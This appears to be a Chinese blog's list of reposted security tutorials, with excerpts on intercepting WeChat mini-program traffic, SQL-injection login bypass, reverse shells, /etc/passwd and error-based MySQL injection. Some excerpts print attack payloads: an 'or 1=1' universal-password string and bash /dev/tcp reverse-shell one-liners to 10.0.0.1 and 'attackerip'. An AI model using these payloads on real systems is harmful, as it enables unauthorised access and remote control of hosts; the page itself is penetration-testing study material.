转载
文章平均质量分 69
echokp
这个作者很懒,什么都没留下…
展开
-
微信小程序抓包
第一步:下载burp证书双击安装点击安装证书点击下一步点击下一步就完成安装了然后打开win+r+inetcpl.cpl设置如下打开电脑微信->小程序,burp就能抓到微信小程序的包了。转载自https://blog.csdn.net/weixin_44281516/article/details/121140397?spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-2%转载 2022-01-08 23:28:47 · 202 阅读 · 0 评论 -
sql注入之万能密码总结
万能密码万能密码原理原验证登陆语句:SELECT * FROM admin WHERE Username= '".$username."' AND Password= '".md5($password)."'输入 1′ or 1=1 or ‘1’=’1万能密码语句变为:SELECT * FROM admin WHERE Username='1' OR 1=1 OR '1'='1' AND Password='EDFKGMZDFSDFDSFRRQWERRFGGG'即得到优先级关系:or<转载 2021-12-03 00:30:55 · 14152 阅读 · 0 评论 -
反弹shell的姿势
目录自带工具BashnetcatTelnet其他工具gawkxterm常见脚本pythonPerlRubyPHPjava自带工具Bash0x01bash -i >& /dev/tcp/10.0.0.1/8080 0>&10x02exec /bin/bash 0&0 2>&00x030<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&转载 2021-11-14 22:50:54 · 165 阅读 · 0 评论 -
linux下的/etc/passwd详解
在Linux /etc/passwd文件中每个用户都有一个对应的记录行,它记录了这个用户的一些基本属性。系统管理员经常会接触到这个文件的修改以完成对用户的管理工作。类似于下面的例子:从上面的例子我们可以看到,/etc/passwd中一行记录对应着一个用户,每行记录又被冒号(:)分隔为7个字段,其格式和具体含义如下:用户名:口令:用户标识号:组标识号:注释性描述:主目录:登录Shell“用户名”代表用户账号的字符串。通常长度不超过8个字符,并且由大小写字母和/或数字组成。登录名中不能有冒号(??转载 2021-11-10 22:52:55 · 5260 阅读 · 0 评论 -
获取内核,操作系统和设备信息
获取内核,操作系统和设备信息命令作用uname -a打印所有可用的系统信息uname -r内核版本信息uname -n系统主机名字hostname主机名uname -mLinux内核架构(x86/x64)cat /proc/version内核信息cat /etc/*-release发布信息cat /etc/issue发布信息cat /proc/cpuinfoCPU信息df -a文件系统信息用户和组转载 2021-11-10 20:40:49 · 151 阅读 · 0 评论 -
详细解读mysql十二种报错注入
使用条件查询不回显内容,会打印错误信息报错原理报错型注入则是利用了MySQL的第8652号bug :Bug #8652 group by part of rand() returns duplicate key error来进行的盲注,使得MySQL由于函数的特性返回错误信息,进而我们可以显示我们想要的信息,从而达到注入的效果mysql语句的特性–子查询在这里虽然语句b有错误,但是由于语句a没有错误所以成功查询出变量A,随后变量A与语句b构成新的语句,又由于语句b存在错误,所以报错时连带着变量转载 2021-11-06 17:40:59 · 464 阅读 · 0 评论